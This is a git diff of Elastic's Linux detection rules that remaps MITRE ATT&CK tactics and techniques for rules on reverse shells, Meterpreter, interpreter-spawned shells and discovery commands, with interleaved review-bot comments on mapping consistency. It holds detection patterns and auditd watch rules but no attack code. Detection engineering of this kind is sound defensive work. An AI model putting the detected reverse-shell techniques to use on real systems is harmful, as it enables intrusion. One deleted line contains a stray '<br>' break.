b/rules/linux/execution_python_tty_shell.toml index c8eff177979..739358a6ff2 100644 --- a/rules/linux/execution_python_tty_shell.toml +++ b/rules/linux/execution_python_tty_shell.toml 
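Review bot: The new Execution entry maps T1106 (Native API) to a process-start-in-shared-memory detection, but a process start event does not evidence direct OS API calls; T1106 is normally reserved for telemetry that sees the call itself. The sibling `Threat: BPFDoor` rule `execution_process_started_from_process_id_file.toml` earlier in this patch was left with a Defense Evasion entry only, so the two BPFDoor rules now disagree on whether a process start counts as Execution. Either keep Execution on both with the same technique, or drop T1106 here and remove `Tactic: Execution` from the tags hunk above so the tag/tactic check stays consistent.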
@@ -2,7 +2,7 @@
 creation_date = "2020/04/15"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -117,6 +117,11 @@ id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.006"
 name = "Python"
diff --git a/rules/linux/execution_python_webserver_spawned.toml b/rules/linux/execution_python_webserver_spawned.toml
index 5f6a9442737..6306061e099 100644
--- a/rules/linux/execution_python_webserver_spawned.toml
+++ b/rules/linux/execution_python_webserver_spawned.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/04"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -126,16 +126,3 @@ reference = "https://attack.mitre.org/techniques/T1059/006/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1570"
-name = "Lateral Tool Transfer"
-reference = "https://attack.mitre.org/techniques/T1570/"
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
diff --git a/rules/linux/execution_shell_evasion_linux_binary.toml b/rules/linux/execution_shell_evasion_linux_binary.toml
index a1fd996d20e..60af7276a56 100644
--- a/rules/linux/execution_shell_evasion_linux_binary.toml
+++ b/rules/linux/execution_shell_evasion_linux_binary.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/05/06"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/11"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -126,15 +126,7 @@ Session View uses process data collected by the Elastic Defend integration, but
 For more information about the additional fields collected when this setting is enabled and the usage of Session View for Analysis refer to the [helper guide](https://www.elastic.co/guide/en/security/current/session-view.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -194,19 +186,31 @@ process where host.os.type == "linux" and event.type == "start" and process.exec
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1202"
+name = "Indirect Command Execution"
+reference = "https://attack.mitre.org/techniques/T1202/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
diff --git a/rules/linux/execution_shell_openssl_client_or_server.toml b/rules/linux/execution_shell_openssl_client_or_server.toml
index b57a9c5ebbe..59e7bcf2dd8 100644
--- a/rules/linux/execution_shell_openssl_client_or_server.toml
+++ b/rules/linux/execution_shell_openssl_client_or_server.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/30"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -79,16 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Data Source: Elastic Endgame",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -114,27 +105,14 @@ not process.parent.executable in (
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
+id = "T1573"
+name = "Encrypted Channel"
+reference = "https://attack.mitre.org/techniques/T1573/"
 [[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
+id = "T1573.002"
+name = "Asymmetric Cryptography"
+reference = "https://attack.mitre.org/techniques/T1573/002/"
 [rule.threat.tactic]
 id = "TA0011"
diff --git a/rules/linux/execution_shell_via_background_process.toml b/rules/linux/execution_shell_via_background_process.toml
index 71f6934441f..4565044ed1e 100644
--- a/rules/linux/execution_shell_via_background_process.toml
+++ b/rules/linux/execution_shell_via_background_process.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/09/20"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -83,17 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Data Source: Elastic Endgame",
- "Data Source: Crowdstrike",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -106,6 +96,19 @@ process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -120,16 +123,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/execution_shell_via_child_tcp_utility_linux.toml b/rules/linux/execution_shell_via_child_tcp_utility_linux.toml
index b1d6944dd41..70bad06fdd8 100644
--- a/rules/linux/execution_shell_via_child_tcp_utility_linux.toml
+++ b/rules/linux/execution_shell_via_child_tcp_utility_linux.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/11/02"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -84,14 +84,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 type = "eql"
 query = '''
 sequence by host.id, process.entity_id with maxspan=5s
@@ -108,6 +101,19 @@ sequence by host.id, process.entity_id with maxspan=5s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -122,16 +128,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/execution_shell_via_java_revshell_linux.toml b/rules/linux/execution_shell_via_java_revshell_linux.toml
index ca489d0cc11..45f7f7ec55b 100644
--- a/rules/linux/execution_shell_via_java_revshell_linux.toml
+++ b/rules/linux/execution_shell_via_java_revshell_linux.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/04"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -139,16 +139,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
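Review bot: `execution_shell_via_java_revshell_linux.toml` only deletes its Command and Control `[[rule.threat]]` entry (T1071, TA0011) and gets no replacement, whereas the sibling reverse-shell rules in this diff (`execution_shell_via_background_process.toml`, `execution_shell_via_child_tcp_utility_linux.toml`, the tcp/udp CLI utility rules) swap T1071 for a `T1095` Non-Application Layer Protocol entry under the same tactic. If this rule also fires on a network reverse shell, it now carries no C2 mapping at all, which looks unintended next to the others. No tags hunk for this file appears in the diff, so please also confirm its `tags` no longer contain `Tactic: Command and Control`; otherwise the tag names a tactic with no matching threat entry.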
diff --git a/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml b/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml
index 26b891475de..434c19d770b 100644
--- a/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml
+++ b/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/04"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -82,14 +82,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 type = "eql"
 query = '''
 sequence by host.id, process.entity_id with maxspan=1s
@@ -121,6 +114,19 @@ sequence by host.id, process.entity_id with maxspan=1s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -131,20 +137,17 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.011"
+name = "Lua"
+reference = "https://attack.mitre.org/techniques/T1059/011/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/execution_shell_via_meterpreter_linux.toml b/rules/linux/execution_shell_via_meterpreter_linux.toml
index 8e75039764d..3bdb54b7611 100644
--- a/rules/linux/execution_shell_via_meterpreter_linux.toml
+++ b/rules/linux/execution_shell_via_meterpreter_linux.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/10"
 integration = ["auditd_manager"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -61,14 +61,7 @@ However, if more advanced configuration is required to detect specific behavior,
 -w /etc/passwd -p wa -k passwd
 """
 severity = "high"
-tags = [
- "Data Source: Auditd Manager",
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Resources: Investigation Guide",
-]
+tags = ["Tactic: Discovery", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
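Review bot: In `execution_shell_via_meterpreter_linux.toml` the rewritten tag list puts `"Tactic: Discovery"` first, ahead of `"Data Source: Auditd Manager"`, and `execution_shell_via_udp_cli_utility_linux.toml` later in this diff likewise moves its two `Tactic:` tags to the front, while every other file here keeps tactic tags right after `"Use Case: Threat Detection"`. Placing the tactic tag after `"Use Case: Threat Detection"` in both auditd rules would keep the ordering uniform across the set. Separately, this rule now maps only to Discovery (TA0007) but keeps its `execution_` file-name prefix; whether the repository's naming convention calls for a rename is not something this diff shows, so flagging it only for a decision.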
@@ -118,29 +111,26 @@ Meterpreter is a sophisticated payload within the Metasploit framework, enabling
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "T1016"
+name = "System Network Configuration Discovery"
+reference = "https://attack.mitre.org/techniques/T1016/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1082"
+name = "System Information Discovery"
+reference = "https://attack.mitre.org/techniques/T1082/"
 [[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
+id = "T1087"
+name = "Account Discovery"
+reference = "https://attack.mitre.org/techniques/T1087/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1087.001"
+name = "Local Account"
+reference = "https://attack.mitre.org/techniques/T1087/001/"
 [rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/linux/execution_shell_via_suspicious_binary.toml b/rules/linux/execution_shell_via_suspicious_binary.toml
index ed5b8943ef7..356cfbbcded 100644
--- a/rules/linux/execution_shell_via_suspicious_binary.toml
+++ b/rules/linux/execution_shell_via_suspicious_binary.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/05"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -83,14 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 type = "eql"
 query = '''
 sequence by host.id, process.entity_id with maxspan=1s
@@ -116,6 +109,19 @@ sequence by host.id, process.entity_id with maxspan=1s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -130,16 +136,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml b/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml
index c8be644cd99..3623af76665 100644
--- a/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml
+++ b/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/04"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -82,14 +82,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 type = "eql"
 query = '''
 sequence by host.id with maxspan=5s
@@ -106,6 +99,19 @@ sequence by host.id with maxspan=5s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -120,16 +126,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[r<br>ule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/execution_shell_via_udp_cli_utility_linux.toml b/rules/linux/execution_shell_via_udp_cli_utility_linux.toml
index 35f575a8b8e..80a1c2d1c61 100644
--- a/rules/linux/execution_shell_via_udp_cli_utility_linux.toml
+++ b/rules/linux/execution_shell_via_udp_cli_utility_linux.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/04"
 integration = ["auditd_manager"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -95,14 +95,7 @@ However, if more advanced configuration is required to detect specific behavior,
 - For this detection rule no additional audit rules are required to be added to the integration.
 """
 severity = "medium"
-tags = [
- "Data Source: Auditd Manager",
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Resources: Investigation Guide",
-]
+tags = ["Tactic: Command and Control", "Tactic: Execution", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -127,6 +120,19 @@ sample by host.id, process.pid, process.parent.pid
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -141,16 +147,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml b/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml
index 19461e6ab6b..c5e14b5e1f1 100644
--- a/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml
+++ b/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/06/26"
 integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -85,17 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: SentinelOne",
- "Data Source: Crowdstrike",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -109,29 +99,16 @@ not (process.parent.name in ("sh", "sudo") and ?process.parent.command_line : "*
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
+[[rule.threat.technique.subtechnique]]
+id = "T1027.015"
+name = "Compression"
+reference = "https://attack.mitre.org/techniques/T1027/015/"
+
 [[rule.threat.technique]]
 id = "T1140"
 name = "Deobfuscate/Decode Files or Information"
diff --git a/rules/linux/execution_suspicious_executable_running_system_commands.toml b/rules/linux/execution_suspicious_executable_running_system_commands.toml
index 880ff976e63..9dde89eea91 100644
--- a/rules/linux/execution_suspicious_executable_running_system_commands.toml
+++ b/rules/linux/execution_suspicious_executable_running_system_commands.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/06/14"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -81,15 +81,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -121,20 +113,39 @@ process.parent.executable:(
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
+id = "T1016"
+name = "System Network Configuration Discovery"
+reference = "https://attack.mitre.org/techniques/T1016/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique]]
+id = "T1033"
+name = "System Owner/User Discovery"
+reference = "https://attack.mitre.org/techniques/T1033/"
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat.technique]]
+id = "T1049"
+name = "System Network Connections Discovery"
+reference = "https://attack.mitre.org/techniques/T1049/"
+
+[[rule.threat.technique]]
+id = "T1057"
+name = "Process Discovery"
+reference = "https://attack.mitre.org/techniques/T1057/"
+[[rule.threat.technique]]
+id = "T1082"
+name = "System Information Discovery"
+reference = "https://attack.mitre.org/techniques/T1082/"
+
+[[rule.threat.technique]]
+id = "T1083"
+name = "File and Directory Discovery"
+reference = "https://attack.mitre.org/techniques/T1083/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.parent.name"]
diff --git a/rules/linux/execution_suspicious_mining_process_creation_events.toml b/rules/linux/execution_suspicious_mining_process_creation_events.toml
index 30a5f83b43b..d66c1399690 100644
--- a/rules/linux/execution_suspicious_mining_process_creation_events.toml
+++ b/rules/linux/execution_suspicious_mining_process_creation_events.toml
